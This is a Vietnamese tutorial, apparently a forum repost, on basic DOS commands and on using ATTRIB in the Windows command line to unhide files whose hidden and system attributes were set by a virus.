31. Một số lệnh cơ bản trong việc khởi tạo và di chuyển thư mục, tập tinhuunghi2109 đã viết:CD <path> : đưa đến vị trí thư mục theo đường dẫn.Đặc biệt : cd.. : ra khỏi đường dẫn hiện tại 1 thư mục.cd\ : thoát ra thư mục gốc.MD <foldername> : tạo thư mục với tên foldername.EDIT <filename.asm>: tạo file mới với tên filename dạng asm mà không cần phải vào Win.(asm có thể thay đổi theo loại file cần tạo như com,txt,exe,doc...)(Ứng dụng tốt cho môn hợp ngữ.)REN : đổi tên file và đuôi file cho cùng 1 lúc nhiều file mà không cần click từng file như trong Win.( ứng dụng tốt cho anh em nào cần đổi đuôi file như .flv,.avi thành .doc...để giấu thôg tin.hi hi...)VD: ren *.avi *.doc : đổi tất cả file có dạng avi thành dạng doc.EXIT : thoát ra khỏi màn hình DOS.Nguồn: Hiện & Ẩn file trong Windows bằng lệnh ATTRIB http://vn-ace.info/diendan/showthread.php?tid=206#ixzz1IhFBL4j2 Vn-Ace.Info
Một số loại virus khi lây nhiễm vào máy tính thường vô hiệu hóa tính năng hiện file ẩn ( hidden file ) và các file hệ thống ( system file ), để tránh bị phát hiện bằng mắt thường virus còn đặt thêm thuộc tính system cho các file ẩn . Vì thế khi chưa diệt được virus mà bạn có cố gắng bật lại chế độ hiện file ẩn trong Folder Options cũng vô dụng và hậu quả là các file mà bạn tự đặt thuộc tính ẩn cũng không thể thấy được, ngay cả khi dùng chương trình quản lý file chuyên nghiệp như total commander.
Khi gặp trường hợp này bạn có thể sử dụng câu lệnh ATTRIB trong command line ( CMD ) để loại bỏ thuộc tính ẩn ở những file và thư mục cần thiết.1. Khởi động command line từ nút Start-->Run ( phím tắt Windows + R ) sau đó gõ vào cmd rồi nhấn phím enter.2. Cách sử dụng câu lệnh ATTRIB .Khi vào cửa sổ chương trình cmd bạn có thể gõ lệnh ATTRIB /? để xem cách viết và ý nghĩa của câu lệnh.
Microsoft Windows XP [Version 5.1.2600]© Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\Minit>attrib /?Displays or changes file attributes.
ATTRIB [+R | -R] [+A | -A ] [+S | -S] [+H | -H] [drive:][path][filename][/S [/D]]
+ Sets an attribute. // dấu + để thêm thuộc tính- Clears an attribute. // dấu - để loại bỏ thuộc tínhR Read-only file attribute. // thuộc tính chỉ đọcA Archive file attribute. // thuộc tính lưu trữS System file attribute. // thuộc tính hệ thốngH Hidden file attribute. // thuộc tính ẩn[drive:][path][filename]Specifies a file or files for attrib to process. // đường dẫn đến ổ đĩa, thư mục và tập tin cần đặt thuộc tính ( nếu tên tập tin và thư mục có chứa khoảng trắng hay kí tự đặc biệt bạn cần phải để đường dẫn trong dấu "" )/S Processes matching files in the current folderand all subfolders. // tham số này sẽ thực hiện lệnh đố với file nằm trong thư mục hiện hành và tất cả thư mục con/D Processes folders as well. // tham số này chỉ dùng để đặt thuộc tính cho thư mục và thư mục con chứ không đặt thuộc tính cho file bên trong thư mục
3. Ví dụ minh họa:1. Giả sử trên máy tính của mình có một loạt file có thuộc tính ẩn nằm trong thư mục clip hot của ổ D ( D:\clip hot\ ) đã bị ẩn.Để nhìn thấy được các file ẩn này mình dùng lệnh sau để loại bỏ thuộc tính ẩn cho các file này:attrib -s -h "D:\clip hot\*"
- Vì thư mục clip hot có chứa khoảng trắng nên mình phải đặt đường dẫn trong dấu ""- Kí tự * là kí tự đại diện cho phép lệnh thực hiện đối với tất cả các file có trong thư mục "clip hot". bạn có thể sử dụng *.jpg hay *.avi hay bất kì đuôi nào để thao tác với các tập tin có phần đuôi mở rộng là jpg, avi,...- Nếu bên trong thư mục "clip hot" có chứa các thư mục con khác cũng bị ẩn thì bạn thêm vào sau lệnh 2 tham số /s và /d để lệnh thực hiện đối với tất cả các thư mục và tập tin bên trong .attrib -s -h "D:\clip hot\*" /s /d
2. Loại bỏ thuộc tính ẩn (-h) và thuộc tính file hệ thống (-s) cho toàn bộ file và folder trong ổ D từ dấu nháy ta đánh lệnh di chuyển đến ổ D bằng lệnh D: sau đó gõ tiếp lệnh sau:attrib -h -s /S /D(D:\> attrib -h -s /S /D)4. Một câu lệnh hỗ trợ ATTRIB .- Lệnh chuyển ổ đĩa : để chuyển từ ổ đĩa C sang D ta thêm dấu : vào sau kí tự của ổ đĩa cần chuyển tới .C:\Documents and Settings\Minit>D:
- Lệnh chuyển đổi thư mục : Khi đang ở D:\> nếu muốn chuyển vào thư mục clip hot ta dùng lệnh D:\>cd clip hot . Nếu muốn quay về thư mục gốc của ổ D ta dùng lệnh D:\clip hot>cd..- Nếu đường dẫn đến tập tin quá dài bạn có thể thu gọn đường dẫn đó lại ( đường dẫn trong dos ) bằng lệnh liệt kê dir với tham số /x
congtruongit.com
